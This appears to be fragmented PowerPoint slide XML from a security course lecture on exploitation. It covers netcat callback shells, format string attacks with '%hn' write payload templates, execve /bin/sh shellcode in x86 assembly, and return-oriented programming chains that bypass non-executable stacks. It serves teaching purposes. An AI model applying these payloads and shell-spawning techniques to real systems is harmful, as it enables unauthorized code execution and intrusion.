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740FB6-7469-4202-98AE-6EA444E91681}">
  <a:tblStyle styleId="{A3740FB6-7469-4202-98AE-6EA444E916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Terminal 0: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nc -l 31337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Terminal 1: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./2.2.10 $(python 2.2.10.py)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Type sh-type commands in Terminal 0. It runs in Terminal 1, but all output is sent to Terminal 0.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socket setup code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0x70257025 is our “%p”s on the stack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Prefix with “ABCD” to see the beginning of our string more clearly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4$ skips to 4th arg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%p prints out top of stack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0x70257025 is our “%p”s on the stack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Prefix with “ABCD” to see the beginning of our string more clearly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%x reads off stack also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specify # chars to read off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%n: puts size UP TILL there to mmry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 treats as half size, hh ¼ (bottom half of arg)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Can also write as such...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cltd = convert signed long to signed double long: sign extend EAX -&gt; EDX:EAX (so it zeroes EDX)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Push in littled endian or PACK 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Null term by putting edx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Ebx has ptr/addr of the bin/sh str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Ecx has addr of null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Then int 0x80 does sys call w/ args on stack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objdump -d ./exe_to_dump &gt; exe_to_dump.txt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vim exe_to_dump.txt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objdump produces a lot of code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MUST end in “ret”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“add” val to stack with push, pop puts that into that register. Overwrite nedxt return as well.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seweb.ucsd.edu/~hovav/dist/geometry.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploit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Buffer Overflows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Callback Shell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netcat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Callback Shell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3623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433550" y="1031275"/>
            <a:ext cx="32937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Don’t forget to redirect stdin/stdout/stderr to socket descriptor!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Format String Attack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5052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Format String Attack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114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printf("%p%p%p%p");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98252"/>
            <a:ext cx="6658199" cy="13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Format String Attack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55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printf("ABCD%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x");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // Print at least </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> characters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printf("ABCD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r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // Write the number of characters printed to memory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printf("%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$x");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // Print the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th argument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printf("%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x");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // Treat the argument as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alf-size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00" y="3314275"/>
            <a:ext cx="4812642" cy="20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50" y="1633150"/>
            <a:ext cx="3044375" cy="2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100" y="2006388"/>
            <a:ext cx="3489300" cy="2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925" y="4316025"/>
            <a:ext cx="3489300" cy="30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3976875" y="4331650"/>
            <a:ext cx="14052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(2 bytes)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Format String Attack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Goal: overwrite return address to point to buffer containing shellcode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malicious_code + padding + ADDR1 + ADDR2 + "%00000x%04$hn%00000x%05$hn"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malicious_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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0xbfff1234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Print a total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0x1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> characters first, write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address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Print a total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0xbfff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> characters, write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address + #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>            Hint: think about what the offset is; remember endianness for byte ordering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ROP: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https://cseweb.ucsd.edu/~hovav/dist/geometry.pdf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Format string attack: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http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html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Can We Use Buffer Overflows?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Modify stack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 variables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 function pointers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Change return addresses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5292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Buffer overflows are pretty simple…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Start writing on the stack…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just keep going until you overwrite an important variable…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overwrite the return address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can jump to code we’ve placed on the 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More on this next week</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Stack diagrams Copy.png" id="69" name="Shape 69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="922" r="922" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754350" y="950188"/>
            <a:ext cx="288494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x="8631350" y="1593900"/>
            <a:ext cx="396125" cy="2348925"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="93957" w="15845">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1739" y="2547"/>
                  <a:pt x="7891" y="8265"/>
                  <a:pt x="10439" y="15287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12986" y="22309"/>
                  <a:pt x="14478" y="33805"/>
                  <a:pt x="15286" y="42132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16093" y="50458"/>
                  <a:pt x="15907" y="58288"/>
                  <a:pt x="15286" y="65248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14664" y="72207"/>
                  <a:pt x="13670" y="79105"/>
                  <a:pt x="11558" y="83890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9445" y="88674"/>
                  <a:pt x="4100" y="92279"/>
                  <a:pt x="2609" y="93957"/>
                </a:cubicBezTo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1" name="Shape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-978680">
            <a:off x="3771489" y="89927"/>
            <a:ext cx="2411053" cy="1445665"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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#flashback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Shellcode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 $0xb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 %eax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cltd				; edx &lt;- sext(eax)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 %edx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 $0x68732f2f		; “//sh”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 $0x6e69622f		; “/bin”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%esp,%ebx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 %edx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 %ebx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%esp,%ecx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$0x80</a:t>
            </a:r>
          </a:p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*null = NULL;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*bin_sh = "/bin//sh";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**argv = &amp;bin_sh;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sys_execve(bin_sh, argv, NULL);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objdump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Return-Oriented Programming (ROP)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Execution Prevention (DEP)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NX bit (No eXecute - AMD), XD (eXecute Disable - Intel), XN (eXecute Never - ARM)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See also: W^X (Write XOR eXecute)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Mark the stack as non-executable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Prevents us from running shellcode we place on the stack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Return-Oriented Programming (ROP)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4035600" cy="250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Idea: chain different </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (bits of code that already exist in the program)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Overwrite the return address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Instead of returning to our shellcode, return to the middle of other code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Execute a few instructions, then return again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Gadget has to work, but gadget’s </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> also has to work (doesn’t contain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\0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/>
              <a:t>, space…)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Return-Oriented Programming (ROP)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4035600" cy="233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Idea: chain different </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (bits of code that already exist in the program)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Overwrite the return address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Instead of returning to our shellcode, return to the middle of other code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Execute a few instructions, then return again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Gadget has to work, but gadget’s </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> also has to work (doesn’t contain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\0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/>
              <a:t>, space…)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452544" cy="38209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Shape 104"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2480075" y="36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{A3740FB6-7469-4202-98AE-6EA444E91681}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1734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0x080481ed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Value for EBX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Next gadget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" name="Shape 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103125" y="3731925"/>
            <a:ext cx="2036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Original return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2081900" y="3893200"/>
            <a:ext cx="4059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7" name="Shape 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511850" y="2861800"/>
            <a:ext cx="2932800" cy="25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ROP Example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42575"/>
            <a:ext cx="4620651" cy="7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15625"/>
            <a:ext cx="5126527" cy="737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Shape 115"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="72814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{A3740FB6-7469-4202-98AE-6EA444E91681}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1550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0x8057360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0xbfff0000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0xbfff3230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0x12341234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0x8055060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Next Gadget…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16" name="Shape 116"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4879225" y="1086050"/>
            <a:ext cx="2384800" cy="264300"/>
            <a:chOff x="4879225" y="1086050"/>
            <a:chExt cx="2384800" cy="264300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="117" name="Shape 117"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4879225" y="1086050"/>
              <a:ext cx="20754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algn="r">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>Original return address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="118" name="Shape 118"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6890225" y="1218200"/>
              <a:ext cx="373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19" name="Shape 119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4879225" y="1464050"/>
            <a:ext cx="2384800" cy="264300"/>
            <a:chOff x="4879225" y="1086050"/>
            <a:chExt cx="2384800" cy="264300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="120" name="Shape 120"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4879225" y="1086050"/>
              <a:ext cx="20754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/>
                <a:t>EDX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="121" name="Shape 121"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6890225" y="1218200"/>
              <a:ext cx="373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22" name="Shape 122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4879225" y="1871675"/>
            <a:ext cx="2384800" cy="264300"/>
            <a:chOff x="4879225" y="1086050"/>
            <a:chExt cx="2384800" cy="264300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123" name="Shape 123"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4879225" y="1086050"/>
              <a:ext cx="20754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/>
                <a:t>ECX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="124" name="Shape 124"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6890225" y="1218200"/>
              <a:ext cx="373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25" name="Shape 125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4879225" y="2279300"/>
            <a:ext cx="2384800" cy="264300"/>
            <a:chOff x="4879225" y="1086050"/>
            <a:chExt cx="2384800" cy="264300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Shape 126"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4879225" y="1086050"/>
              <a:ext cx="20754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/>
                <a:t>EBX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="127" name="Shape 127"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6890225" y="1218200"/>
              <a:ext cx="373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28" name="Shape 128"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4879225" y="2657300"/>
            <a:ext cx="2384800" cy="264300"/>
            <a:chOff x="4879225" y="1086050"/>
            <a:chExt cx="2384800" cy="264300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Shape 129"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4879225" y="1086050"/>
              <a:ext cx="20754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"/>
                <a:t>Next</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> return address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="130" name="Shape 130"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6890225" y="1218200"/>
              <a:ext cx="373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